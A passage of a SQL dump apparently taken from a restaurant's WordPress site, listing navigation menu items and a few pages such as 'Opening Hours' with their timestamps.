Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1859,NULL,NULL,4013,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1860,NULL,NULL,4014,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1861,NULL,NULL,4015,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1862,NULL,NULL,4016,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1863,NULL,NULL,4017,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1864,NULL,NULL,4018,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1865,NULL,NULL,4019,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1866,NULL,NULL,4020,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1867,NULL,NULL,4021,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1868,NULL,NULL,4022,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1869,NULL,NULL,4023,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1870,NULL,NULL,4024,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1871,NULL,NULL,4025,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1872,NULL,NULL,4026,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1873,NULL,NULL,4027,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1874,NULL,NULL,4028,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1875,NULL,NULL,4029,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1876,NULL,NULL,4030,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1877,NULL,NULL,4031,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1878,NULL,NULL,4032,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1879,NULL,NULL,4033,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1880,NULL,NULL,4034,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:10','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1881,'https://www.ristorantesolymar.it/vecchio/opening-hours/','55:843380c2f05dfd3cb13ad7450a507d90',4035,'post','page',1,0,NULL,NULL,'Opening Hours','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,NULL,'2021-01-23 17:36:11','2021-01-31 20:24:28',1,NULL,NULL,NULL,NULL,0,NULL),(2580,NULL,NULL,4603,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-26 12:25:45','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2578,'https://www.ristorantesolymar.it/vecchio/demo-main/','51:d5061fb69c3e939a96c2408ab6e3a470',4598,'post','page',71,0,NULL,NULL,'Demo Main','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,22,NULL,NULL,'2021-01-26 08:17:14','2021-01-31 20:24:25',1,NULL,NULL,NULL,NULL,0,NULL),(1885,NULL,NULL,4038,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1886,NULL,NULL,4039,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1887,NULL,NULL,4040,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1888,NULL,NULL,4041,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1889,NULL,NULL,4042,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1890,NULL,NULL,4043,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1891,NULL,NULL,4044,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1892,NULL,NULL,4045,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1893,NULL,NULL,4046,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1894,NULL,NULL,4047,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1895,NULL,NULL,4048,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1896,NULL,NULL,4049,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1897,NULL,NULL,4050,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1898,NULL,NULL,4051,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1899,NULL,NULL,4052,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1900,NULL,NULL,4053,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1901,NULL,NULL,4054,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1902,NULL,NULL,4055,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1903,NULL,NULL,4056,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1904,NULL,NULL,4057,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1905,NULL,NULL,4058,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1906,NULL,NULL,4059,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1907,NULL,NULL,4060,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1908,NULL,NULL,4061,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1909,NULL,NULL,4062,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1910,NULL,NULL,4063,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1911,NULL,NULL,4064,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1912,NULL,NULL,4065,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1913,NULL,NULL,4066,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1914,NULL,NULL,4067,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:14','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1915,NULL,NULL,4068,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1916,NULL,NULL,4069,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1917,NULL,NULL,4070,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1918,NULL,NULL,4071,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1919,NULL,NULL,4072,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1920,NULL,NULL,4073,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1921,NULL,NULL,4074,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1922,NULL,NULL,4075,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1923,NULL,NULL,4076,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1924,NULL,NULL,4077,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1925,NULL,NULL,4078,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1926,NULL,NULL,4079,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1927,NULL,NULL,4080,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1928,NULL,NULL,4081,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1929,NULL,NULL,4082,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1930,NULL,NULL,4083,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1931,NULL,NULL,4084,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1932,NULL,NULL,4085,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1933,NULL,NULL,4086,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:36:15','2021-01-29 